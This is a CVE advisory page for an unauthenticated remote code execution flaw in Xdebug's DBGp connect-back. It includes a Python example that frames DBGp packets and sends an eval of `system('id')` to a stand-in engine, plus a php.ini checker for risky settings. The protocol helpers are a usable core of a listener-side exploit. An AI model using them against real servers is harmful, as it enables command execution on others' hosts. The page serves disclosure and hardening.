CVE-2015-10141 (PUBLISHED)

An unauthenticated remote code execution vulnerability exists in Xdebug versions 2.5.5 and earlier, a PHP debugging extension developed by Derick Rethans. Xdebug does not listen for debuggers; it is a DBGp client. Once remote debugging is enabled (xdebug.remote_enable=1), it opens a TCP connection from the web server to the debugger on port 9000 (the xdebug.remote_port default) whenever a request carries a debug trigger such as an XDEBUG_SESSION_START parameter or an XDEBUG_SESSION cookie. With xdebug.remote_connect_back=1 the destination is the address of the requesting client (taken from X-Forwarded-For, falling back to REMOTE_ADDR), so anyone who can reach the web server and run a listener on port 9000 receives the session. The DBGp session has no authentication: the listener can issue an eval command to run arbitrary PHP, including system() or passthru() to execute OS commands. The result is arbitrary command execution on the host with the privileges of the web server user.
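The exchange and the configuration check described above, as an added example in Python that is not code from Xdebug or from this advisory. The engine side is a constructed stand-in that speaks just enough DBGp to show the length-prefixed framing and the unauthenticated eval round trip; it runs no PHP and only echoes the expression it was sent. The php.ini check goes beyond the affected 2.x line by also knowing the renamed Xdebug 3 directives (xdebug.mode, xdebug.discover_client_host, xdebug.client_host, xdebug.client_port), which this page says nothing about. The idekey, appid, file path and the ini snippets are made up for the demo.

```python
# Added example, not code from Xdebug or this advisory; engine side is a constructed stand-in.
import base64
import re
import socket
import threading
import xml.etree.ElementTree as ET

NS = "{urn:debugger_protocol_v1}"
LOOPBACK = {"localhost", "127.0.0.1", "::1"}

def dbgp_encode(xml_text):
    """Engine-to-client framing: decimal length, NUL, XML payload, NUL."""
    data = xml_text.encode()
    return str(len(data)).encode() + b"\x00" + data + b"\x00"

def dbgp_decode(buf):
    """Split complete engine packets out of a byte stream; return (xml_list, leftover)."""
    packets = []
    while True:
        nul = buf.find(b"\x00")
        if nul < 0 or not buf[:nul].isdigit():
            break
        end = nul + 1 + int(buf[:nul])
        if len(buf) < end + 1:              # payload or its trailing NUL not here yet
            break
        packets.append(buf[nul + 1:end].decode())
        buf = buf[end + 1:]
    return packets, buf

def dbgp_eval_command(txid, php_expr):
    """Client-to-engine command: 'eval -i <txid> -- <base64 code>' ending in NUL."""
    return f"eval -i {txid} -- {base64.b64encode(php_expr.encode()).decode()}\x00".encode()

def parse_eval_response(xml_text):
    """Return the base64-encoded property value carried by an eval <response>."""
    prop = ET.fromstring(xml_text).find(NS + "property")
    return base64.b64decode(prop.text or "").decode()

def fake_engine(conn):
    """Stand-in for Xdebug 2.x after it connected back: send <init>, answer one eval, hang up."""
    conn.sendall(dbgp_encode('<init xmlns="urn:debugger_protocol_v1" language="PHP" protocol_version="1.0" '
                             'appid="4242" idekey="PHPSTORM" fileuri="file:///var/www/html/index.php"></init>'))
    cmd = b""
    while not cmd.endswith(b"\x00"):
        chunk = conn.recv(4096)
        if not chunk:
            return
        cmd += chunk
    m = re.match(rb"eval -i (\d+) -- (\S+)\x00", cmd)
    expr = base64.b64decode(m.group(2)).decode()
    # A real engine would run expr with the web server's privileges; this one only echoes it.
    out = base64.b64encode(f"constructed result for: {expr}".encode()).decode()
    conn.sendall(dbgp_encode(f'<response xmlns="urn:debugger_protocol_v1" command="eval" transaction_id='
                             f'"{m.group(1).decode()}"><property type="string" encoding="base64">{out}</property></response>'))
    conn.close()

def run_exchange(php_expr):
    """Play the listener's side of one session over a socketpair; return the eval result."""
    client, engine = socket.socketpair()
    worker = threading.Thread(target=fake_engine, args=(engine,))
    worker.start()
    buf, packets = b"", []
    while not packets:                          # the engine speaks first, with <init>
        buf += client.recv(4096)
        packets, buf = dbgp_decode(buf)
    client.sendall(dbgp_eval_command(1, php_expr))  # no credentials are ever asked for
    packets = []
    while not packets:
        buf += client.recv(4096)
        packets, buf = dbgp_decode(buf)
    worker.join()
    client.close()
    return parse_eval_response(packets[0])

def xdebug_ini_findings(ini_text):
    """Flag php.ini settings that let a remote party receive the DBGp session."""
    kv = {}
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()
        if "=" in line:
            key, val = line.split("=", 1)
            kv[key.strip().lower()] = val.strip().strip('"').strip("'")
    on = lambda key: kv.get(key, "0").lower() in {"1", "on", "true", "yes"}
    findings = []
    if on("xdebug.remote_enable"):                              # Xdebug 2.x directive names
        if on("xdebug.remote_connect_back"):
            findings.append("remote_connect_back=1: engine connects to the requester's IP")
        elif kv.get("xdebug.remote_host", "localhost") not in LOOPBACK:
            findings.append(f"remote_host={kv['xdebug.remote_host']}: engine connects off-host")
    if "debug" in [m.strip() for m in kv.get("xdebug.mode", "develop").split(",")]:  # Xdebug 3 names
        if on("xdebug.discover_client_host"):
            findings.append("discover_client_host=1: engine connects to the requester's IP")
        elif kv.get("xdebug.client_host", "localhost") not in LOOPBACK:
            findings.append(f"client_host={kv['xdebug.client_host']}: engine connects off-host")
    return findings

WEAK_INI = "xdebug.remote_enable = 1\nxdebug.remote_connect_back = 1\n"                      # constructed
SAFE_INI = "xdebug.remote_enable = 1\nxdebug.remote_host = 127.0.0.1\nxdebug.remote_connect_back = 0\n"

if __name__ == "__main__":
    print(run_exchange("system('id')"), xdebug_ini_findings(WEAK_INI), xdebug_ini_findings(SAFE_INI))
```

Run it directly to see the echoed eval result, one finding for the weak ini and none for the hardened one. The hardened variant keeps remote_enable=1 but pins remote_host to loopback with connect_back off, so the engine can only ever reach a debugger running on the host itself; disabling remote debugging outright on production hosts is simpler. The check only reads ini text and does not confirm the extension is loaded, so pair it with the output of php -m or phpinfo().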

Risk Scores

EPSS Score: 65.71% (98.5th percentile)

Affected Products

Vendor            Product   Versions
Ubuntu 20.04 LTS  xdebug    0, 2.9.2+2.8.1+2.5.5-1build1, 2.9.2+2.8.1+2.5.5-1
Ubuntu 16.04 LTS  xdebug    0, 2.3.3-1ubuntu1, 2.3.3-2
Ubuntu 18.04 LTS  xdebug    2.5.5-3, 2.6.0-0ubuntu1, 0
Ubuntu 24.04 LTS  xdebug    0, 3.2.0+3.1.6+2.9.8+2.8.1+2.5.5-3build1, 3.2.0+3.1.6+2.9.8+2.8.1+2.5.5-3ubuntu1
Ubuntu 22.04 LTS  xdebug    *, 0, 3.0.3+2.9.8+2.8.1+2.5.5-0+deb11u1build1
Ubuntu 25.10      xdebug    0, 3.4.3-1, 3.4.5-3

Version strings are reproduced as the feed lists them; the "0" and "*" entries appear to be range boundary markers from the feed rather than package versions.

Timeline

  • May 29, 2018 PoC Published
  • Jul 23, 2025 CVE Published
  • Jul 24, 2025 EPSS Score
  • Aug 2, 2025 EPSS Score
  • Aug 13, 2025 PoC Published
  • Aug 17, 2025 EPSS Score
  • Aug 20, 2025 EPSS Score
  • Sep 7, 2025 EPSS Score
  • Sep 16, 2025 EPSS Score
  • Oct 4, 2025 EPSS Score
  • Oct 8, 2025 EPSS Score
  • Oct 13, 2025 EPSS Score